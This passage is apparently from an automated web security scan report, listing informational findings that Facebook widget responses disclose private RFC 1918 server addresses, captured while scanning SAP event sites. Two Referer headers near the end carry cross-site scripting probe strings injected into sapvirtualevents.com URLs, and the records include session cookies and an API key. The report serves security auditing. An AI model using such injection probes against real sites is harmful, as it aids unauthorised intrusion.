Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20
sdn_uid: Guest
sdn_guid: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
sdn_visit: QUMxMDU0MDgtMTMzMDgxNzBFNTktQUNBQzA5QTU4MkExRkM0NA==
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-confluence-request-time: 1318690688602
x-confluence-cluster-node: Member(Id=1, Timestamp=2011-10-09 03:06:04.333, Address=172.16.84.8:8088, MachineId=59400, Location=process:23847@spwdfvml0204)
Location: https://wiki.sdn.sap.com:443/wiki/display/HOME/FAQ
Content-Length: 1751
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:58:08 GMT
Connection: close
Set-Cookie: saplb_*=(J2EE8243320)8243350; Version=1; Path=/
Set-Cookie: JSESSIONID=8zWp1LE9zVQKhsRFGYO-DyFbDhcIMwGWyH0A_SAPgKRDRzD6Pucfy_Alqw7AWMYs; Version=1; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>302 Found</title>
<style>
td {font-family : Arial, Tahoma, Helvetica, sans-serif; font-size : 14px;}

...[SNIP]...
20.15. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/fan.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&channel_url=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&id=74338051990&name=&width=680&connections=24&stream=0&logobar=1&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.connect.facebook.com/widgets/fan.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&channel_url=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&id=74338051990&name=&width=680&connections=24&stream=0&logobar=1&css=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.23.120
X-Cnection: close
Date: Sat, 15 Oct 2011 14:24:03 GMT
Content-Length: 13779

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
20.16. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/fan.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&channel_url=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&id=74338051990&name=&width=680&connections=24&stream=0&logobar=1&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.108.108
X-Cnection: close
Date: Sat, 15 Oct 2011 14:41:45 GMT
Content-Length: 13465

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
20.17. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/fan.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&channel_url=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&id=74338051990&name=&width=680&connections=24&stream=0&logobar=1&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.19.127
X-Cnection: close
Date: Sat, 15 Oct 2011 14:24:39 GMT
Content-Length: 13542

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
20.18. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&extern=0&channel=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&locale=en_US&sdk=edgar HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.43.52
X-Cnection: close
Date: Sat, 15 Oct 2011 14:41:32 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
20.19. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&extern=0&channel=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&locale=en_US&sdk=edgar HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.130.59
X-Cnection: close
Date: Sat, 15 Oct 2011 14:24:36 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
20.20. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&extern=0&channel=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&locale=en_US&sdk=edgar HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/extern/login_status.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&extern=0&channel=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&locale=en_US&sdk=edgar
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.137.62
X-Cnection: close
Date: Sat, 15 Oct 2011 14:24:01 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
20.21. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.16.77
X-Cnection: close
Date: Sat, 15 Oct 2011 15:26:03 GMT
Content-Length: 23557

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.22. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.11.45
X-Cnection: close
Date: Sat, 15 Oct 2011 15:26:27 GMT
Content-Length: 23378

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.23. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newsgator.com/partners/become-a-newsgator-partner.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.143.61
X-Cnection: close
Date: Sat, 15 Oct 2011 15:27:56 GMT
Content-Length: 23405

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.24. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newsgator.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.15.87
X-Cnection: close
Date: Sat, 15 Oct 2011 15:29:08 GMT
Content-Length: 23364

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.25. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newsgator.com/partners/channel-partners.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.25.23
X-Cnection: close
Date: Sat, 15 Oct 2011 15:28:03 GMT
Content-Length: 23395

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.26. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newsgator.com/Default.aspx?tabid=214
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.145.49
X-Cnection: close
Date: Sat, 15 Oct 2011 15:26:02 GMT
Content-Length: 23386

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.27. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d1e4dc8%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff59d1fcc%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d1e4dc8%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff59d1fcc%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.73.50
X-Cnection: close
Date: Sat, 15 Oct 2011 14:30:13 GMT
Content-Length: 25731

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.28. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d1e4dc8%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff59d1fcc%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapvirtualevents.com/teched/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.82.40
X-Cnection: close
Date: Sat, 15 Oct 2011 14:53:16 GMT
Content-Length: 25213

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.29. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df235c310e816678%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ffd2c5a5061f9db%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.sapvirtualevents.com/teched/?d4b6c'-alert(1)-'d067c1ecac1=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.facebook.com
Proxy-Connection: Keep-Alive
Cookie: datr=fCRBTg_ZngztwJJ8-42u7Bpc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.56.54
X-Cnection: close
Date: Sat, 15 Oct 2011 15:17:36 GMT
Content-Length: 25774

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.30. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df38b382895cfcf2%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff2c7f6a4630ba84%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.sapvirtualevents.com/teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26433fe'%3balert(1)//fea0f539288
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.facebook.com
Proxy-Connection: Keep-Alive
Cookie: datr=fCRBTg_ZngztwJJ8-42u7Bpc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
